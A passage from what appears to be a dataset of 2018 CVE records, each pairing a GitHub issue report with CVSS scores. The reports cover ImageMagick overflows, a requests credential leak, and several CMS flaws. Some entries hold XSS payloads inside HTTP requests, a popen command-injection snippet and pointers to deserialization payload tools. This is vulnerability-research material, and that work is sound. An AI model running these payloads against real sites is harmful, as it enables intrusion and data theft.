        "description": "heap buffer overflow in APITAG of svg.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG a heap buffer overflow in APITAG function of svg.c Steps to Reproduce APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG fa fa APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG NUMBERTAG c0e7fff NUMBERTAG a NUMBERTAG fa fa fa fa fa NUMBERTAG APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18025",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1335",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1335",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-10-05T12:00:14Z",
        "description": "heap buffer overflow in APITAG of pict.c. Prerequisites X] I have written a descriptive issue title [X] I have verified that I am using the latest version of APITAG [X] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG a heap buffer overflow in APITAG function of pict.c Steps to Reproduce APITAG NUMBERTAG c NUMBERTAG fffdad0: fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa APITAG NUMBERTAG c NUMBERTAG fffdae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdaf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG NUMBERTAG c NUMBERTAG fffdb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa APITAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): APITAG Addressable NUMBERTAG APITAG Partially addressable NUMBERTAG APITAG Heap left redzone: fa APITAG Heap right redzone: fb APITAG Freed heap region: fd APITAG Stack left redzone: f1 APITAG Stack mid redzone: f2 APITAG Stack right redzone: f3 APITAG Stack partial redzone: f4 APITAG Stack after return: f5 APITAG Stack use after scope: f8 APITAG Global redzone: f9 APITAG Global init order: f6 APITAG Poisoned by user: f7 APITAG Container overflow: fc APITAG Array cookie: ac APITAG Intra object redzone: bb APITAG APITAG internal: fe APITAG NUMBERTAG ABORTING` System Configuration APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI APITAG Delegates (built in): bzlib djvu fftw fontconfig freetype jbig jng jpeg lcms lqr lzma openexr pangocairo png tiff wmf x xml zlib Environment APITAG system, version and so on): Linux test virtual machine NUMBERTAG generic NUMBERTAG Ubuntu SMP Wed Jul NUMBERTAG UTC NUMBERTAG APITAG Additional information: APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18074",
        "Issue_Url_old": "https://github.com/requests/requests/issues/4716",
        "Issue_Url_new": "https://github.com/psf/requests/issues/4716",
        "Repo_new": "psf/requests",
        "Issue_Created_At": "2018-06-27T09:06:49Z",
        "description": "Should Authorization header be cleared in https > http redirect?. This may be considered intentional behaviour (in which case feel free to close this), but if a request is made to an https endpoint with authorization and it redirects to http on the same host, the Authorization header is not stripped and will be exposed on the wire. Expected Result rebuild_auth would strip the Authorization header if the scheme is changed from https to http. Actual Result The credentials that were intended to be sent over TLS were transmitted in plaintext with the redirected request. Reproduction Steps Run an HTTPS server on localhost NUMBERTAG that replies with a NUMBERTAG redirect to APITAG , and a plain HTTP server (or netcat) on localhost NUMBERTAG Then run APITAG The basic auth credentials are sent in plaintext to APITAG (the APITAG is just because I had a self signed cert). Here's the code I used for the SSL server: CODETAG System Information CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18082",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/6",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/6",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2018-10-09T14:17:18Z",
        "description": "xss Vulnerability in Waimai Super Cms. xss Vulnerability in Waimai Super Cms In waimai Super Cms master, there is an XSS vulnerability via the PATHTAG and PATHTAG fname parameter. Payload: APITAG alert NUMBERTAG APITAG Exploit URL / Algorithm NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xxx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"fname\" sample APITAG alert NUMBERTAG APITAG NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; name=\"pic\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"fprice NUMBERTAG Content Disposition: form data; name=\"fcontent\" sss NUMBERTAG Content Disposition: form data; name=\"fsort NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host NUMBERTAG User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG NUMBERTAG cke NUMBERTAG laig NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"fname\" furf APITAG alert NUMBERTAG APITAG NUMBERTAG Content Disposition: form data; name=\"fid NUMBERTAG Content Disposition: form data; name=\"fcid NUMBERTAG Content Disposition: form data; name=\"pic\"; filename=\"\" Content Type: application/octet stream NUMBERTAG Content Disposition: form data; name=\"fprice NUMBERTAG Content Disposition: form data; name=\"fcontent\" dsdd NUMBERTAG Content Disposition: form data; name=\"fsort NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18086",
        "Issue_Url_old": "https://github.com/SukaraLin/php_code_audit_project/issues/1",
        "Issue_Url_new": "https://github.com/l1nk3rlin/php_code_audit_project/issues/1",
        "Repo_new": "l1nk3rlin/php_code_audit_project",
        "Issue_Created_At": "2018-10-09T07:13:32Z",
        "description": "Empirecms NUMBERTAG getshell. The vulnerability trigger point is at the red frame in the image FILETAG Click System > System Settings > Manage Data Table to import your own mod file. APITAG Mod file content FILETAG finally getshell FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18087",
        "Issue_Url_old": "https://github.com/Bixie/pagekit-portfolio/issues/44",
        "Issue_Url_new": "https://github.com/bixie/pagekit-portfolio/issues/44",
        "Repo_new": "bixie/pagekit-portfolio",
        "Issue_Created_At": "2018-10-08T10:13:24Z",
        "description": "Store XSS in image url field. Portfolio Version NUMBERTAG PHP Version NUMBERTAG Login user who has APITAG portfolio \" privilege can inject arbitrary web script or HTML via editor, XSS vulnerability will be triggered by visiting /portfolio/${project_title}. POC FILETAG FILETAG Title field also vulnerable to XSS,",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-18088",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1152",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1152",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2018-10-09T05:37:21Z",
        "description": "OPENJPEG null ptr dereference in PATHTAG DESCRIPTION OPENJPEG null ptr dereference in PATHTAG VERSION OPENJPEG NUMBERTAG GDB Output NUMBERTAG a5d in imagetopnm (image NUMBERTAG a NUMBERTAG outfile NUMBERTAG fffffffbcac APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG a0e1 in main (argc NUMBERTAG arg NUMBERTAG fffffffddf8) at PATHTAG NUMBERTAG ffff NUMBERTAG e7b NUMBERTAG in __libc_start_main (main NUMBERTAG ed APITAG , argc NUMBERTAG arg NUMBERTAG fffffffddf8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG aa in _start () GDB Information pwndbg> print red NUMBERTAG int NUMBERTAG pwndbg> print image APITAG NUMBERTAG OPJ_INT NUMBERTAG pwndbg> c Continuing. Program received signal SIGSEGV, Segmentation fault NUMBERTAG a5d in imagetopnm (image NUMBERTAG a NUMBERTAG outfile NUMBERTAG fffffffbcac APITAG force_split NUMBERTAG at PATHTAG NUMBERTAG red + APITAG Analysis image APITAG = NULL and it was assigned to red, so the program accesses to red, segment fault occurs. poc Contact me if you need Poc file at EMAILTAG or EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18190",
        "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/41",
        "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/41",
        "Repo_new": "gopro/gpmf-parser",
        "Issue_Created_At": "2018-10-09T04:09:19Z",
        "description": "divide by zero crash. Caused by APITAG : APITAG if type not in APITAG APITAG will return NUMBERTAG Workaround: ERRORTAG APITAG Report: ERRORTAG Base NUMBERTAG encoded payload: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-18198",
        "Issue_Url_old": "https://github.com/redaxo/redaxo4/issues/422",
        "Issue_Url_new": "https://github.com/redaxo/redaxo4/issues/422",
        "Repo_new": "redaxo/redaxo4",
        "Issue_Created_At": "2018-09-25T07:56:34Z",
        "description": "NUMBERTAG Reflected Cross site scripting (XSS) vulnerabilityin REDAXO NUMBERTAG details in PATHTAG CODETAG The value of $opener_input_field is obtained from an HTTP request and is a string. in PATHTAG ERRORTAG This directly outputs $opener_input_field to the js code. Causing XSS vulnerabilities. POC The user directly accesses the URL if the user has logged in. URLTAG XSS will be triggered as shown: APITAG FILETAG Credit: APITAG of APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18201",
        "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/2",
        "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/2",
        "Repo_new": "yanchongchong/swallow",
        "Issue_Created_At": "2018-10-08T03:53:50Z",
        "description": "qibosoft_csrf. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18209",
        "Issue_Url_old": "https://github.com/chekun/DiliCMS/issues/59",
        "Issue_Url_new": "https://github.com/chekun/dilicms/issues/59",
        "Repo_new": "chekun/dilicms",
        "Issue_Created_At": "2018-10-10T09:49:17Z",
        "description": "XSS Vulnerability Found in APITAG NUMBERTAG in tab=site_attachment. XSS Vulnerability Found in APITAG NUMBERTAG in tab=site_attachment Software Link : FILETAG POC : POST PATHTAG HTTP NUMBERTAG Host: localhost Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG Cookie: dili_session=xxxxx Connection: close Upgrade Insecure Requests NUMBERTAG APITAG .jpg NUMBERTAG B .gif NUMBERTAG B .png NUMBERTAG B APITAG Screenshots : FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18215",
        "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/3",
        "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/3",
        "Repo_new": "yanchongchong/swallow",
        "Issue_Created_At": "2018-10-10T16:20:36Z",
        "description": "youke NUMBERTAG csrf. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18240",
        "Issue_Url_old": "https://github.com/pippo-java/pippo/issues/454",
        "Issue_Url_new": "https://github.com/pippo-java/pippo/issues/454",
        "Repo_new": "pippo-java/pippo",
        "Issue_Created_At": "2018-09-28T11:19:15Z",
        "description": "Lead to RCE when unmarshal xml data with APITAG The APITAG unmarshal xml data based on APITAG it doesn't check the data; when the data contains malicious types,then it may leads to remote code execution; The Struts2 framework once had the same issue( URLTAG Using the following code snippet to convert the malicious xml data\uff1b CODETAG The malicious xml data is as follows\uff1a FILETAG The tool marshalsec( URLTAG can help to generate more kinds of payload including the one above; To mitigate the vulnerability,since version APITAG provides developers with some APIs(such APITAG to restrict the types be unmarshalled\uff1b Here we could fix the issue refer to the patch URLTAG of Struts2.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18242",
        "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/4",
        "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/4",
        "Repo_new": "yanchongchong/swallow",
        "Issue_Created_At": "2018-10-11T06:43:42Z",
        "description": "youke NUMBERTAG SQL inject. CODETAG Using this packet test\u3002A SQL injection vulnerability exists in FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18261",
        "Issue_Url_old": "https://github.com/caokang/waimai/issues/7",
        "Issue_Url_new": "https://github.com/caokang/waimai/issues/7",
        "Repo_new": "caokang/waimai",
        "Issue_Created_At": "2018-10-11T13:51:14Z",
        "description": "xss Vulnerability in Waimai Super Cms NUMBERTAG ia fcname parameter. In waimai Super Cms NUMBERTAG there is an XSS vulnerability via the PATHTAG fcname parameter. Payload: APITAG alert NUMBERTAG APITAG POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xxx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG page_iframe_url= URLTAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded Content Length NUMBERTAG fcname=form APITAG alert NUMBERTAG APITAG &fcsort NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18270",
        "Issue_Url_old": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/12",
        "Issue_Url_new": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/12",
        "Repo_new": "cmsmadesimple/cmsmadesimple-2-0",
        "Issue_Created_At": "2018-10-12T14:29:25Z",
        "description": "XSS Vulnerability in CMS MADE SIMPLE version NUMBERTAG ia m1_news_url parameter . Locate APITAG > News >add article payload NUMBERTAG onmouseover=prompt NUMBERTAG bad=\" Affected vectors: m1_extra HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG __c=a NUMBERTAG fd1cd NUMBERTAG c4db3b; wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"mact\" News,m1_,addarticle NUMBERTAG Content Disposition: form data; name=\"__c\" a NUMBERTAG fd1cd NUMBERTAG c4db3b NUMBERTAG Content Disposition: form data; name=\"m1_title\" Dinakaran NUMBERTAG Content Disposition: form data; name=\"m1_category NUMBERTAG Content Disposition: form data; name=\"m1_summary\" APITAG ssss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_content\" APITAG sss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_status\" published NUMBERTAG Content Disposition: form data; name=\"m1_news_url\" slugform1\" onmouseover=prompt NUMBERTAG bad NUMBERTAG Content Disposition: form data; name=\"m1_extra\" Informative NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"m1_searchable NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"preview_template NUMBERTAG Content Disposition: form data; name=\"preview_returnid NUMBERTAG Content Disposition: form data; name=\"m1_submit\" Submit NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18271",
        "Issue_Url_old": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/13",
        "Issue_Url_new": "https://github.com/cmsmadesimple/cmsmadesimple-2-0/issues/13",
        "Repo_new": "cmsmadesimple/cmsmadesimple-2-0",
        "Issue_Created_At": "2018-10-12T14:36:10Z",
        "description": "XSS Vulnerability in CMS MADE SIMPLE version NUMBERTAG ia m1_extra parameter . Locate APITAG > News >add article payload NUMBERTAG onmouseover=prompt NUMBERTAG bad=\" Affected vectors:m1_extra HTTP REQUEST: POST PATHTAG HTTP NUMBERTAG Host: xx.x.x.x:xx User Agent: Mozilla NUMBERTAG Linu NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Referer: URLTAG Cookie: APITAG __c=a NUMBERTAG fd1cd NUMBERTAG c4db3b; wp settings time NUMBERTAG APITAG APITAG __atuvc NUMBERTAG C NUMBERTAG APITAG APITAG APITAG Connection: close Upgrade Insecure Requests NUMBERTAG Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"mact\" News,m1_,addarticle NUMBERTAG Content Disposition: form data; name=\"__c\" a NUMBERTAG fd1cd NUMBERTAG c4db3b NUMBERTAG Content Disposition: form data; name=\"m1_title\" dinakaran NUMBERTAG Content Disposition: form data; name=\"m1_category NUMBERTAG Content Disposition: form data; name=\"m1_summary\" APITAG ssss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_content\" APITAG sss APITAG NUMBERTAG Content Disposition: form data; name=\"m1_status\" published NUMBERTAG Content Disposition: form data; name=\"m1_news_url\" Slugform NUMBERTAG Content Disposition: form data; name=\"m1_extra\" informative1\" onmouseover=prompt NUMBERTAG bad NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"m1_searchable NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; APITAG NUMBERTAG Content Disposition: form data; name=\"preview_template NUMBERTAG Content Disposition: form data; name=\"preview_returnid NUMBERTAG Content Disposition: form data; name=\"m1_submit\" Submit NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18274",
        "Issue_Url_old": "https://github.com/kermitt2/pdfalto/issues/33",
        "Issue_Url_new": "https://github.com/kermitt2/pdfalto/issues/33",
        "Repo_new": "kermitt2/pdfalto",
        "Issue_Created_At": "2018-10-12T07:47:10Z",
        "description": "two bugs in pdfalto. I found two bugs in pdfalto, the details can be found at here URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-18308",
        "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/356",
        "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/356",
        "Repo_new": "bigtreecms/bigtree-cms",
        "Issue_Created_At": "2018-12-25T23:05:17Z",
        "description": "CVETAG . I know that this is old case, but can you tell me in what version or commit this is fixed, thank you? FILETAG URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18315",
        "Issue_Url_old": "https://github.com/xuhuisheng/lemon/issues/175",
        "Issue_Url_new": "https://github.com/xuhuisheng/lemon/issues/175",
        "Repo_new": "xuhuisheng/lemon",
        "Issue_Created_At": "2018-10-10T08:27:50Z",
        "description": "\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. \u60a8\u597d\uff1a APITAG APITAG FILETAG APITAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18316",
        "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/5",
        "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/5",
        "Repo_new": "yanchongchong/swallow",
        "Issue_Created_At": "2018-10-12T03:06:58Z",
        "description": "emlog_csrf. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18317",
        "Issue_Url_old": "https://github.com/yanchongchong/swallow/issues/6",
        "Issue_Url_new": "https://github.com/yanchongchong/swallow/issues/6",
        "Repo_new": "yanchongchong/swallow",
        "Issue_Created_At": "2018-10-12T08:17:51Z",
        "description": "dscms_csrf. CODETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18320",
        "Issue_Url_old": "https://github.com/qoli/Merlin.PHP/issues/26",
        "Issue_Url_new": "https://github.com/qoli/merlin.php/issues/26",
        "Repo_new": "qoli/merlin.php",
        "Issue_Created_At": "2018-10-11T08:58:17Z",
        "description": "\u5b89\u5168\u95ee\u9898 \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e. APITAG popen\u51fd\u6570\u5bfc\u81f4\u547d\u4ee4\u6267\u884c\u3002 $c = _GET('command', 'unknow'); $handle = popen($c, \"r\"); \u6f0f\u6d1e\u8be6\u60c5\u8bf7\u53c2\u8003\uff1a URLTAG poc\uff1a APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-18361",
        "Issue_Url_old": "https://github.com/gnat/nc-cms/issues/10",
        "Issue_Url_new": "https://github.com/gnat/nc-cms/issues/10",
        "Repo_new": "gnat/nc-cms",
        "Issue_Created_At": "2018-10-15T08:48:57Z",
        "description": "nc cms Cross Site Scripting . Hello, I found that this cms may have some security problem you can edit your html on URLTAG and you can Input any evil js you want URLTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-18385",
        "Issue_Url_old": "https://github.com/asciidoctor/asciidoctor/issues/2888",
        "Issue_Url_new": "https://github.com/asciidoctor/asciidoctor/issues/2888",
